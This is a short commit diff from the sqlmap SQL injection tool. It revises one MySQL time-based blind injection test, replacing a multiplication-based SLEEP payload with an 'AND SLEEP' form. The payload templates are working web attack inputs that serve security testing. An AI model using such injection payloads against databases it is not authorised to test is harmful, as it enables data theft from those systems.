This commit is contained in:
Miroslav Stampar 2015-02-25 10:16:01 +01:00
parent 6bcc95a20d
commit b74edf9664

View File

@ -1036,15 +1036,15 @@
</test> </test>
<test> <test>
<title>MySQL time-based blind - Parameter replace (bool*int)</title> <title>MySQL time-based blind - Parameter replace (bool)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3</clause>
<where>3</where> <where>3</where>
<vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector> <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
<request> <request>
<payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload> <payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>